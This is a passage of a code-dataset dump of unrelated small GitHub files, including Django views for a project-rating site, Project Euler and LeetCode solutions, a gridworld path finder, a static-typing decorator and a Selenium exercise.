profile(request):\n current_user = request.user\n profile = Profile.objects.filter(user_id=current_user.id).first()\n project = Project.objects.filter(user_id=current_user.id).all()\n\n return render(request, \"profile.html\", {\"profile\": profile, \"screenshots\": project})\n\n\n@login_required(login_url=\"/accounts/login/\")\ndef update_profile(request):\n if request.method == \"POST\":\n current_user = request.user\n first_name = request.POST[\"first_name\"]\n last_name = request.POST[\"last_name\"]\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n bio = request.POST[\"bio\"]\n contact = request.POST[\"contact\"]\n\n profile_image = request.FILES[\"profile_pic\"]\n profile_image = cloudinary.uploader.upload(profile_image)\n profile_url = profile_image[\"url\"]\n\n user = User.objects.get(id=current_user.id)\n if Profile.objects.filter(user_id=current_user.id).exists():\n profile = Profile.objects.get(user_id=current_user.id)\n profile.profile_pic = profile_url\n profile.bio = bio\n profile.contact = contact\n profile.save()\n else:\n profile = Profile(\n user_id=current_user.id,\n profile_pic=profile_url,\n bio=bio,\n contact=contact,\n )\n profile.save_profile()\n\n user.first_name = first_name\n user.last_name = last_name\n user.username = username\n user.email = email\n\n user.save()\n\n return redirect(\"/profile\", {\"success\": \"Profile update successful\"})\n else:\n return render(request, \"profile.html\", {\"danger\": \"Profile update unsuccessful\"})\n\n#project views \ndef project_details(request, project_id):\n project = Project.objects.get(id=project_id)\n rating = Vote.objects.filter(project=project)\n return render(request, \"project.html\", {\"project\": project, \"rating\": rating})\n\n@login_required(login_url=\"/accounts/login/\")\ndef save_project(request):\n if request.method == \"POST\":\n current_user = request.user\n title = request.POST[\"title\"]\n location = request.POST[\"location\"]\n description = request.POST[\"description\"]\n url = request.POST[\"url\"]\n screenshot = request.FILES[\"image\"]\n screenshot = cloudinary.uploader.upload() \n image_url = screenshot[\"url\"]\n\n project = Project(\n user_id=current_user.id,\n title=title,\n location=location,\n description=description,\n url=url,\n screenshot=image_url,\n )\n project.save_project()\n\n return redirect(\"/profile\", {\"success\": \"Project Saved Successfully\"})\n else:\n return render(request, \"profile.html\", {\"danger\": \"Project Save Failed\"})\n\n\n#rate projects\n@login_required(login_url='/accounts/login/')\ndef rate_project(request, id):\n if request.method == \"POST\":\n project = Project.objects.get(id=id)\n current_user = request.user\n design_rate=request.POST[\"design\"]\n usability_rate=request.POST[\"usability\"]\n content_rate=request.POST[\"content\"]\n\n Vote.objects.create(\n project=project,\n user=current_user,\n design_rate=design_rate,\n usability_rate=usability_rate,\n content_rate=content_rate,\n average_rate=round((float(design_rate)+float(usability_rate)+float(content_rate))/3,2),\n )\n average_rating= (int(design_rate)+int(usability_rate)+int(content_rate))/3\n project.rate=average_rating\n project.update_project()\n\n return render(request, \"project.html\", {\"success\": \"Project Rated!\", \"project\": project, \"rating\": Vote.objects.filter(project=project)})\n else:\n project = Project.objects.get(id=id)\n return render(request, \"project.html\", {\"danger\": \"Rating Failed\", \"project\": project})\n\n\n# search for project\ndef search_project_title(request):\n if 'search_term' in request.GET and request.GET[\"search_term\"]:\n search_term = request.GET.get(\"search_term\")\n searched_projects = Project.objects.filter(title=search_term)\n message = f\"Search For: {search_term}\"\n\n return render(request, \"search.html\", {\"message\": message, \"projects\": searched_projects})\n else:\n message = \"No term searched, please input search term\"\n return render(request, \"search.html\", {\"message\": message})\n\n\n# delete project\n@login_required(login_url=\"/accounts/login/\")\ndef delete_project(request, id):\n project = Project.objects.get(id=id)\n project.delete_project()\n return redirect(\"/profile\", {\"success\": \"Project Deleted\"})\n\n\n \n\n#API Views\nclass ProfileList(APIView): \n permission_classes = (IsAdminOrReadOnly,)\n def get(self, request, format=None):\n all_profiles = Profile.objects.all()\n serializers = ProfileSerializer(all_profiles, many=True)\n return Response(serializers.data)\n\n\nclass ProjectList(APIView): \n permission_classes = (IsAdminOrReadOnly,)\n def get(self, request, format=None):\n all_projects = Project.objects.all()\n serializers = ProjectSerializer(all_projects, many=True)\n return Response(serializers.data)\n","repo_name":"oyesa/DjangoAwwards","sub_path":"awwardsapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21249664338","text":"from fractions import Fraction\r\n#python可以处理分数的函数,Fraction(i, j)是既约分数i/j\r\nn = int(input())#输入的数字\r\nfraction_set = set()\r\nfor i in range(n+1):\r\n for j in range(1, n+1):\r\n if i<=j:\r\n fraction_set.add(Fraction(i, j))\r\n#去除重复元素,用集合\r\nfraction_list = list(fraction_set)\r\nfraction_list.sort()\r\nfor num in fraction_list:\r\n print(num.numerator, end='')\r\n print('/', end='')\r\n print(num.denominator)","repo_name":"Yizhang-Zhu/2020-Summer-Semester","sub_path":"Code/顺序的分数.py","file_name":"顺序的分数.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21138849835","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef emp_data_view(request):\n emp_data = {\n 'eno':5000,\n 'ename':'rao',\n 'esal':50000,\n 'eaddr':'bglr'\n\n\n}\n response = f'

Emp No : {emp_data[\"eno\"]}
Emp name:{emp_data[\"ename\"]}
Emp sal: {emp_data[\"esal\"]}
Emp addr:{emp_data[\"eaddr\"]}

'\n return HttpResponse(response)# shouel dobule quote \"eno\"\n\nimport json\ndef emp_data_json_view(request):\n emp_data = {\n 'eno': 5000,\n 'ename': 'rao',\n 'esal': 50000,\n 'eaddr': 'bglr'\n\n }\n\n json_data = json.dumps(emp_data)\n return HttpResponse(json_data,content_type='application/json') #\n\nfrom django.http import JsonResponse\nfrom django.views.generic import View\ndef emp_data_json_view2(request):\n emp_data = {\n 'eno': 5000,\n 'ename': 'rao',\n 'esal': 50000,\n 'eaddr': 'bglr'\n\n }\n\n\n return JsonResponse(emp_data,content_type='application/json')\n\nfrom testing.mixins import HttpResponseMixins\nclass JsonCBV(HttpResponseMixins,View):\n def get(self,request,*args,**kwargs):\n json_data = json.dumps({'message':'this is get method' })\n return self.render_to_HttpRespnose(json_data)\n\n def post(self,request,*args,**kwargs):\n json_data = json.dumps({'message':'this is post method' })\n return self.render_to_HttpRespnose(json_data)\n\n def put(self,request,*args,**kwargs):\n json_data = json.dumps({'message':'this is put method' })\n return self.render_to_HttpRespnose(json_data)\n\n def delete(self,request,*args,**kwargs):\n json_data = json.dumps({'message':'this is delete method' })\n return self.render_to_HttpRespnose(json_data)","repo_name":"madhavareddy414/djangopractice","sub_path":"restapi_apps/withoutrestot/testing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"4729752873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSolution to Project Euler problem X\n\nAuthor: Jaime Liew\nhttps://github.com/jaimeliew1/Project_Euler_Solutions\n\"\"\"\n\ndef PentNum(n):\n # returns the nth pentagonal number\n return n*(3*n-1)//2\n\n\n\ndef pentPairs():\n pentNums = list(PentNum(x) for x in range(1000, 3000))\n L = len(pentNums)\n for i in range(1, L):\n for j in range(i):\n yield (pentNums[i], pentNums[j])\n\n\n\ndef run():\n pentNums = list(PentNum(x) for x in range(1000, 3000))\n out = []\n for a, b in pentPairs():\n if (a + b in pentNums) and (a - b in pentNums):\n out.append(a - b)\n return out[0]\n return out[0]\n\n\nif __name__ == \"__main__\":\n\n\n print(run())\n\n","repo_name":"jaimeliew1/Project_Euler_Solutions","sub_path":"Python/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17141474817","text":"from flask import Flask\r\n\r\napp = Flask(__name__)\r\nf = open(\"text.txt\",\"r\") #change to rev img report text file\r\noutput = f.read()\r\n\r\n\r\n@app.route(\"/output\")\r\ndef members():\r\n return {\"output\": [output]}\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n\r\nf.close()","repo_name":"wishdar/segp","sub_path":"flask-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28444881721","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import animation\nfrom matplotlib.collections import PatchCollection\n\n\nclass Visualizer:\n\n def __init__(self, array_polygons, x_lim, y_lim, title):\n self.__array_polygons = array_polygons\n self.__x_lim = x_lim\n self.__y_lim = y_lim\n self.__title = title\n self.__fig = plt.figure(figsize=(10, 10))\n self.__ax = plt.subplot()\n\n def plot_polygons(self):\n colors = 100 * np.random.rand(len(self.__array_polygons))\n p = PatchCollection(self.__array_polygons, alpha=.5)\n p.set_array(np.array(colors))\n p.set_edgecolor([0, 0, 0])\n self.__ax.set_xlim((0, self.__x_lim))\n self.__ax.set_ylim((0, self.__y_lim))\n self.__ax.set_title(self.__title)\n self.__ax.add_collection(p)\n plt.show()\n\n def init(self):\n self.__ax.set_title(self.__title)\n plt.ylim(0, self.__y_lim)\n plt.xlim(0, self.__x_lim)\n\n def update(self, frame):\n color = np.random.rand(1, 3)\n p = PatchCollection([self.__array_polygons[frame]], alpha=.5)\n p.set_color(color)\n p.set_edgecolor([0, 0, 0])\n self.__ax.add_collection(p)\n return\n\n def plot_animation(self):\n ani = animation.FuncAnimation(self.__fig,\n self.update,\n interval=500,\n frames=len(self.__array_polygons),\n init_func=self.init,\n repeat=False)\n plt.show()\n return ani\n","repo_name":"WesleyHBNunes/polygons-visualizer","sub_path":"Visualizer.py","file_name":"Visualizer.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"40549930182","text":"from config import *\nimport tweepy\nimport json\nfrom os.path import join as pjoin\nimport pandas as pd\ndata_path = \"data\"\n# authentication\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\nmax_tweets = 5\nquery = 'jenasena'\nsearched_tweets = [\n status._json for status in tweepy.Cursor(\n api.search,\n q=query).items(max_tweets)]\njson_strings = [json.dumps(json_obj) for json_obj in searched_tweets]\n\nwith open(pjoin(data_path,'sample.json'),'w') as f:\n f.write(json_strings[0])\n\n","repo_name":"cerofrais/Twittersenti","sub_path":"get_twitter_date.py","file_name":"get_twitter_date.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24836079940","text":"import itertools\nimport numpy as np\nfrom typing import Dict, Tuple\n\n\ndef read_map(filename):\n map = []\n\n with open(filename) as file:\n text = file.read()\n lines = text.splitlines()\n\n for line in lines:\n line = [int(cell) for cell in line.split()]\n map.append(line)\n\n return map\n\n\n\n\nclass Cargo:\n\n def __init__(self, map) -> None:\n self.map = map\n self.shape = self.get_cargo_shape()\n\n \n def get_right_lower_corner(self, cargo):\n lower = 0\n right = 0\n\n for row, col in cargo:\n lower = max(lower, row)\n right = max(right, col)\n \n return lower, right\n\n\n def get_cargo_shape(self):\n '''Returns list of tupples with shift of cargo's cells\n with respect to right lower corner (if it even does not exist).\n '''\n cargo = []\n\n for row in range(len(self.map)):\n for col in range(len(self.map[0])):\n if self.map[row][col] == 2:\n cargo.append((row, col))\n\n self.corner_row, self.corner_col = self.get_right_lower_corner(cargo)\n\n for part_idx in range(len(cargo)):\n row, col = cargo[part_idx]\n cargo[part_idx] = (row - self.corner_row, col - self.corner_col)\n \n return cargo\n\n \n def get_cargo_coordinates(self, corner_row, corner_col):\n cargo_coordinates = []\n\n for row_shift, col_shift in self.shape:\n cargo_coordinates.append((corner_row + row_shift, corner_col + col_shift))\n\n return cargo_coordinates\n\n \n def is_valid_position(self, corner_row, corner_col):\n\n cargo_coordinates = self.get_cargo_coordinates(corner_row, corner_col)\n\n def is_valid_cell(row, col):\n n_rows = len(self.map)\n n_cols = len(self.map[0])\n\n if row < 0:\n return False\n if row >= n_rows:\n return False\n if col < 0:\n return False\n if col >= n_cols:\n return False\n\n if self.map[row][col] == 1:\n return False\n\n return True\n\n check = [is_valid_cell(row, col) for row, col in cargo_coordinates]\n is_valid = all(check)\n\n return is_valid\n\n\n\n\nclass GridWorld:\n\n class Cell:\n\n def __init__(self, row, col, world, default_reward=-1):\n\n self.row = row\n self.col = col\n self.env = world\n self.default_reward = default_reward\n\n self.actions_to = []\n\n def compute_value(self, gamma=0.9):\n if len(self.actions_to) == 0:\n return self.env.value_function[str(self)]\n qs = []\n for place in self.actions_to:\n action_reward = self.env.rewards.get((str(self), place), self.default_reward)\n next_v = gamma * self.env.value_function[place]\n qs.append(action_reward + next_v)\n return max(qs)\n\n def __str__(self):\n return f\"{self.row}_{self.col}\"\n\n def __repr__(self):\n return str(self)\n\n\n def __init__(self,\n map: list,\n rewards: Dict[Tuple[str, str], float] = {}, \n gamma: float = 0.9,\n default_reward: float = -1):\n \n self.map = map\n self.n_rows = len(map)\n self.n_cols = len(map[0])\n \n coords = itertools.product(range(self.n_rows), range(self.n_cols))\n \n self.state_list = [self.Cell(row, col, self, default_reward) for row, col in coords]\n self.state_dict = {str(cell): cell for cell in self.state_list}\n self.value_function = {str(cell): 0 for cell in self.state_list}\n self.rewards = rewards\n self.gamma = gamma\n\n\n def update_values(self):\n new_value_function = self.value_function.copy()\n \n for cell in self.state_list:\n new_value_function[str(cell)] = cell.compute_value(self.gamma)\n \n self.value_function = new_value_function\n\n\n def visualize(self):\n array = np.zeros((self.n_rows, self.n_cols))\n for col in range(self.n_cols):\n for row in range(self.n_rows):\n array[row, col] = self.value_function[f'{row}_{col}']\n\n print(array)\n\n def get_state_value(self):\n array = np.zeros((self.n_rows, self.n_cols))\n for col in range(self.n_cols):\n for row in range(self.n_rows):\n array[row, col] = self.value_function[f'{row}_{col}']\n\n return array\n\n\n\n\ndef get_state_value_of_map(map):\n cargo = Cargo(map)\n world = GridWorld(map)\n\n for row in range(world.n_rows):\n for col in range(world.n_cols):\n\n if cargo.is_valid_position(row, col) == False:\n world.value_function[f'{row}_{col}'] = -np.inf\n continue\n\n moves = [(1, 0), (-1, 0), (0, -1), (0, 1)]\n\n for row_shift, col_shift in moves:\n new_row = row + row_shift\n new_col = col + col_shift\n\n if cargo.is_valid_position(new_row, new_col):\n world.state_dict[f'{row}_{col}'].actions_to.append(f'{new_row}_{new_col}')\n\n world.state_dict[f'{world.n_rows - 1}_{world.n_cols - 1}'].actions_to = []\n\n for _ in range(100):\n world.update_values()\n \n return world.get_state_value()\n\n\n\n\nclass StateValueMap:\n\n def __init__(self, state_value_map):\n self.map = state_value_map\n self.n_rows = len(state_value_map)\n self.n_cols = len(state_value_map[0])\n\n def is_valid_position(self, row, col):\n if row < 0:\n return False\n if row >= self.n_rows:\n return False\n if col < 0:\n return False\n if col >= self.n_cols:\n return False\n\n if self.map[row][col] == -np.inf:\n return False\n\n return True\n\n def get_possible_moves(self, row, col):\n positions = []\n\n moves = [(1, 0), (-1, 0), (0, -1), (0, 1)]\n\n for row_shift, col_shift in moves:\n new_row = row + row_shift\n new_col = col + col_shift\n\n if self.is_valid_position(new_row, new_col):\n positions.append((new_row, new_col))\n\n return positions\n\n def get_best_moves(self, row, col):\n positions = self.get_possible_moves(row, col)\n maximum = -np.inf\n\n for row, col in positions:\n maximum = max(maximum, self.map[row][col])\n\n moves = []\n for row, col in positions:\n if self.map[row][col] == maximum:\n moves.append((row, col))\n\n return moves\n\n\n\n\ndef get_path_array(map):\n\n state_map = StateValueMap(get_state_value_of_map(map))\n cargo = Cargo(map)\n\n came_from = [len(map[0]) * [None] for _ in range(len(map))]\n\n queue = [(cargo.corner_row, cargo.corner_col)]\n\n while len(queue) != 0:\n cell = queue.pop(0)\n row, col = cell\n\n moves = state_map.get_best_moves(row, col)\n\n for move in moves: \n row, col = move\n if came_from[row][col] == None:\n came_from[row][col] = cell\n queue.append(move)\n\n came_from[cargo.corner_row][cargo.corner_col] = cargo.corner_row, cargo.corner_col\n\n return came_from\n\n\n\n\ndef get_path(map):\n came_from = get_path_array(map)\n\n if came_from[-1][-1] == None:\n return []\n\n path = [came_from[-1][-1]]\n \n row, col = came_from[-1][-1]\n\n while came_from[row][col] != (row, col):\n row, col = came_from[row][col]\n path.append((row, col))\n\n path.reverse()\n path.append((len(map) - 1, len(map[0]) - 1))\n\n return path\n\n\n\n\ndef get_steps(map):\n path = get_path(map)\n\n if len(path) == 0:\n return 'No path'\n\n steps = ''\n\n for i in range(len(path) - 1):\n row_from, col_from = path[i]\n row_to, col_to = path[i + 1]\n\n if (row_to - row_from) == -1:\n steps += 'U '\n\n elif (row_to - row_from) == 1:\n steps += 'D '\n\n elif (col_to - col_from) == -1:\n steps += 'L '\n \n elif (col_to - col_from) == 1:\n steps += 'R '\n\n return steps\n\n\n\n\ndef find_path(path_to_infile, path_to_out_file):\n map = read_map(path_to_infile)\n path = get_steps(map)\n\n with open(path_to_out_file, 'w') as file:\n file.write(path)\n\n\n\n# for i in range(6):\n# find_path(f'./inputs/input{i}.txt', f'./outputs/output{i}.txt')","repo_name":"KKroliKK/Reinforcement-Learning","sub_path":"Assignment1/Andrey_Vagin.py","file_name":"Andrey_Vagin.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24566054968","text":"import collections\nimport functools\nimport types\n\n_error_msg_dict = {\n \"_function\": \"object_type object_name's parameter 'param_name',\",\n \"_attribute\": \"object_type 'param_name' of object object_name,\",\n \"generic\": \" is not the same type as annotated: \\nType given: p_type, type(s) expected: param_types\",\n \"dict_keys\": \" dict container's keys are not all of the type(s): param_types\",\n \"dict_values\": \" dict container's values are not all of the type(s): param_types\",\n \"container\": \" p_type container is not all of the type(s): param_types\",\n}\n\n_type_tuple = collections.namedtuple(\"type_container\",\n [\"object_name\", \"object_type\", \"param_name\", \"param_types\", \"param_value\"])\n\n\ndef _fmt_msg(msg, tc, override=None):\n if \"param_type\" in msg:\n msg = msg.replace(\"p_type\", str(type(tc.param_value)))\n\n if not override:\n override = {}\n\n for (attr, value) in tc._asdict().items(): # this was the quickest/simplest way I found to convert this into a dict\n if attr not in override:\n if attr != \"param_types\":\n msg = msg.replace(attr, str(value))\n else:\n msg = msg.replace(attr, str(value.original_types))\n else:\n msg = msg.replace(attr, str(tuple(override[attr])))\n return msg\n\n\ndef _error_msg(err_type, tc, override=None):\n prefix = _error_msg_dict[\"_function\"] if tc.object_type in [\"function\", \"method\"] else _error_msg_dict[\"_attribute\"]\n err = prefix + _error_msg_dict[err_type]\n\n return _fmt_msg(err, tc, override)\n\n\nclass _TypeWrapper:\n def __init__(self, _type):\n\n self.original_type = _type\n\n if issubclass(type(_type), types.UnionType): # if the type given is a union type.\n self.base_type = None\n self.subscript_types = _type.__args__\n\n elif isinstance(_type, types.GenericAlias): # if the type given is a generic alias type.\n\n self.base_type = _type.__origin__\n self.subscript_types = _type.__args__\n\n if issubclass(self.base_type, dict) and len(self.subscript_types) == 2:\n # handling dict[key_type, value_type] types.\n self.subscript_types = tuple((_TypeWrapper(i),) for i in self.subscript_types)\n\n elif isinstance(*self.subscript_types, types.UnionType):\n self.subscript_types = self.subscript_types[0].__args__\n else:\n self.base_type = _type\n self.subscript_types = None\n # print(f\"BASE: {self.base_type}, SUBSCRP: {self.subscript_types}\")\n\n def __repr__(self):\n return f\"_TypeWrapper(base: {self.base_type}, subscript: {self.subscript_types})\"\n\n\nclass _TypeContainer:\n def __init__(self, _type):\n\n self.types: dict[set] = dict()\n self.original_types = _type\n\n for type_ in self._unpack_type(_type):\n if type_.base_type not in self.types:\n self.types[type_.base_type] = {type_}\n else:\n self.types[type_.base_type].add(type_)\n\n def __repr__(self):\n return f\"_TypeContainer({self.types})\"\n\n @staticmethod\n def _unpack_type(_type):\n if isinstance(_type, types.UnionType):\n return tuple(_TypeWrapper(i) for i in _type.__args__)\n else:\n return _TypeWrapper(_type),\n\n\ndef _validate_type(tc):\n if not issubclass(type(tc.param_value), # if the param value type not in the param_types var.\n tuple(tc.param_types.types)):\n raise TypeError(_error_msg(\"generic\", tc))\n\n err = _validate_type_wrapper(tc)\n if err:\n raise TypeError(err)\n\n\ndef _validate_type_wrapper(tc):\n if type(tc.param_value) not in tc.param_types.types:\n return # meaning the value is a class instance, since it's subclassed from object and is not in the types set.\n\n for type_ in tc.param_types.types[type(tc.param_value)]:\n if not type_.subscript_types: # if not a generic alias, regardless if it's a container,\n # return since that's a type match.\n return\n else:\n if issubclass(type_.base_type, dict) and len(type_.subscript_types) == 2:\n if isinstance(tc.param_value, dict):\n # if type to be checked is dict, the subscript params is 2 and the type of the param value is dict.\n # Checking dict[key_type, value_type]\n\n ga_unpacked_0 = type_.subscript_types[0][0].subscript_types if \\\n type_.subscript_types[0][\n 0].subscript_types else (type_.subscript_types[0][0].base_type,)\n ga_unpacked_1 = type_.subscript_types[1][0].subscript_types if \\\n type_.subscript_types[1][\n 0].subscript_types else (type_.subscript_types[1][0].base_type,)\n\n # this is the spawn of lucifer.\n\n if not all((True if type(i) in ga_unpacked_0 else False for i in tc.param_value)):\n return _error_msg(\"dict_keys\", tc, override={\"param_types\": [*ga_unpacked_0]})\n if not all((True if type(i) in ga_unpacked_1 else False for i in tc.param_value.values())):\n return _error_msg(\"dict_values\", tc, override={\"param_types\": [*ga_unpacked_1]})\n\n return # if the dict is a dict, and has all the correct subscripted types in key and values.\n\n elif not all((True if type(i) in type_.subscript_types else False for i in tc.param_value)):\n # Check if the generic alias container's values are all the specified type(s).\n return _error_msg(\"container\", tc, override={\"param_types\": type_.subscript_types})\n\n\ndef static_type(f):\n \"\"\"\n Decorator for static-typing function parameters. Annotate the type each parameter is meant to be, and if any\n given parameter isn't of the expected type, it will raise a TypeError.\n\n Supports normal types, union types, and container subscript types, and methods. Does not support nested generic\n aliases within generic aliases (Recursion needed, but that might make this a bit slow).\n \"\"\"\n\n @functools.wraps(f) # this helps with the identity of the passed function f.\n def wrapper(*args, **kwargs):\n\n obj_type = \"method\" if (args and hasattr(args[0], f.__name__)) \\\n else \"function\" if isinstance(f, types.FunctionType) else \"attribute\"\n\n # Checking if a method of a class, don't include \"self\"/object ref in the\n # type checking. Have to resort to this jank because inspect.ismethod fails because it doesn't have a\n # __self__ attribute for some reason when passed into the decorator. Something to do with this being\n # before __init__ is called?\n\n _is_static = True if obj_type == \"method\" and issubclass(f.__class__, staticmethod) else False\n\n if not _is_static: # checking whether a decorator has a __func__ arg.\n param_names = f.__code__.co_varnames[:f.__code__.co_argcount]\n else:\n param_names = f.__func__.__code__.co_varnames[:f.__func__.__code__.co_argcount]\n args = args[1:] # exclude first arg, i.e. self. THIS WILL BREAK IF YOU TYPEHINT THE SELF VAR.\n\n concat_args = args + tuple(kwargs.values())\n annotated_args = tuple( # if a param has a typehint: unpack it, else if it doesn't: unpack with an object type.\n (param_name, _TypeContainer(f.__annotations__[param_name])) if param_name in f.__annotations__ else (\n param_name, _TypeContainer(object)) for param_name in param_names)\n\n for param_args, param_value in zip(annotated_args, concat_args):\n param_name, param_types = param_args\n _validate_type(_type_tuple(f.__name__, obj_type, param_name, param_types, param_value))\n\n retval = f(*args, **kwargs)\n\n if \"return\" in f.__annotations__:\n param_types = _TypeContainer(f.__annotations__[\"return\"])\n _validate_type(_type_tuple(f.__name__, obj_type, \"return\", param_types, retval))\n\n return retval\n\n return wrapper\n\n\ndef _is_user_method(attr, value):\n if \"__\" not in attr and getattr(value, 'decorate', True):\n if isinstance(value, staticmethod) and isinstance(value.__func__, types.FunctionType):\n return True\n return isinstance(value, types.FunctionType)\n return False\n\n\ndef dont_static_type(f): # decorator to exclude static-typing methods of a class inherited from StaticBase.\n f.decorate = False\n return f\n\n\nclass StaticBase:\n \"\"\"\n To use, annotate here, like:\n x: int\n y: str\n\n ...then add these attributes in the __init__ method to make them static-typed.\n THIS WILL ONLY STATIC-TYPE THE ATTRIBUTES WHEN BEING ASSIGNED TO (i.e. _setattr_).\n IT WILL NOT PROTECT AN ATTRIBUTE WHEN MUTATING ITSELF.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n for attr, value in cls.__dict__.items():\n if _is_user_method(attr, value):\n setattr(cls, attr, static_type(value))\n return super(StaticBase, cls).__new__(cls)\n\n def __setattr__(self, attr, value):\n if attr in self.__annotations__:\n param_types = _TypeContainer(self.__annotations__[attr])\n _validate_type(_type_tuple(self, \"attribute\", attr, param_types, value))\n self.__dict__[attr] = value\n","repo_name":"Nedoko-maki/static_typing","sub_path":"static_typing.py","file_name":"static_typing.py","file_ext":"py","file_size_in_byte":9443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22820573147","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nimport math, time\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry:\n browser = webdriver.Chrome()\n browser.implicitly_wait(5)\n\n browser.get(\"http://suninjuly.github.io/explicit_wait2.html\")\n\n WebDriverWait(browser, 12).until(EC.text_to_be_present_in_element((By.ID, \"price\"), \"$100\"))\n browser.find_element_by_class_name(\"btn-primary\").click() \n\t\n y = str(calc(browser.find_element_by_css_selector(\"#input_value\").text))\n browser.find_element_by_css_selector(\"#answer\").send_keys(y)\n browser.find_element_by_css_selector(\"#solve\").click()\n\n print(browser.switch_to.alert.text.split(': ')[-1])\t\n \nfinally:\n time.sleep(5)\n browser.switch_to.alert.accept()\n browser.quit()","repo_name":"maria-azb/auto-tests","sub_path":"lesson_2_4_step_8.py","file_name":"lesson_2_4_step_8.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72526521119","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.close('all')\r\n\r\nBsyn= float(input('Enter rate of synthesis: '))\r\nk=float(input('Enter clearance rate constant: '))\r\nT=float(input('Enter total time: '))\r\nlini=float(input('Enter initial number of molecules: '))\r\n\r\ndef birth_death_process(lini, T, k, Bsyn):\r\n ts=[0]\r\n Ls=[lini]\r\n while(ts[-1] str:\n \"\"\"\n This property provides the sensor message's main body\n :return: Updated json readout for the sensor.\n \"\"\"\n out = self.__dict__\n out.pop('signal')\n out.update({'value': str(self.signal.value)})\n out.update({'posix_timestamp': datetime.now().timestamp()})\n out = {'readout': out}\n return json.dumps(out)\n\n @property\n def send_readout_fn(self) -> callable:\n \"\"\" Returns the stored logger callback function \"\"\"\n return self._readout_callback_fn\n\n @send_readout_fn.setter\n def send_readout_fn(self, fn: Union[Callable[[...], None] | None]) -> None:\n \"\"\" Stores de callback function when the sensor is registered \"\"\"\n self._readout_callback_fn = fn\n\n def send_readout(self) -> None:\n \"\"\"\n Sends sensor readout to the logger module via the provided callback\n function\n \"\"\"\n self.send_readout_fn(self.readout)\n\n\n","repo_name":"GSentientWolf/multithreaded","sub_path":"sensors/base_sensor.py","file_name":"base_sensor.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4666739747","text":"class Solution:\n def addToArrayForm(self, num: List[int], k: int) -> List[int]:\n res = []\n n, carry, total = len(num), 0, 0\n for i in range(n - 1, -1, -1):\n total = num[i] + carry + k % 10\n res.append(total % 10)\n carry = total // 10\n k //= 10\n k += carry\n while k > 0:\n res.append(k % 10)\n k //= 10\n return reversed(res)","repo_name":"yiiilonggg/LeetCode","sub_path":"989. Add to Array-Form of Integer/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29569812738","text":"from IOTPSlaveMessage import IOTPSlaveMessage\nfrom IOTPTransactionData import IOTPTransactionData, _LOC_MSG_BODY\n\n_author_ = \"int_soumen\"\n_date_ = \"12-08-2018\"\n\n_LOC_NO_OPERATION = _LOC_MSG_BODY\n_LOC_OPERAND_TYPE = 10\n_LOC_OPERAND_ID = 11\n_LOC_OPERAND_INSTRUCTION = 12\n_LOC_NEXT_OPERAND_INFO = 16\n\n_END_NO_OPERATION = _LOC_OPERAND_TYPE\n\n_LEN_OPERAND_TYPE = 1\n_LEN_OPERAND_ID = 1\n_LEN_OPERAND_INSTRUCTION = 4\n\n_MAX_NO_OPERATION = 8\n\n\nclass IOTPTransactionTypeCommand:\n\n def __init__(self, iotp_trans_data_obj):\n if not isinstance(iotp_trans_data_obj, IOTPTransactionData):\n raise Exception(\"First argument should be an instance of IOTPTransactionData\")\n self.__raw_server_data = iotp_trans_data_obj.get_raw_trans_data()\n self.__no_opr = 0\n self.__operation_info = []\n self.__opr_ctr = -1\n self.__parse_data()\n\n def __parse_data(self):\n # parse number of operation to perform\n self.__no_opr = int(self.__raw_server_data[\n _LOC_NO_OPERATION:\n _END_NO_OPERATION\n ],\n 16)\n if self.__no_opr > _MAX_NO_OPERATION:\n raise Exception(IOTPSlaveMessage.ResponseType.StatusCode.INVALID_REQUEST, \"Maximum 8 operations are \"\n \"allowed.\")\n operation_info_offset = _LOC_OPERAND_TYPE\n\n for k in range(0, self.__no_opr, 1):\n # parse operand type\n opr_type = int(self.__raw_server_data[\n operation_info_offset:\n operation_info_offset + _LEN_OPERAND_TYPE\n ],\n 16)\n operation_info_offset += _LEN_OPERAND_TYPE\n\n # parse operand id\n opr_id = int(self.__raw_server_data[\n operation_info_offset:\n 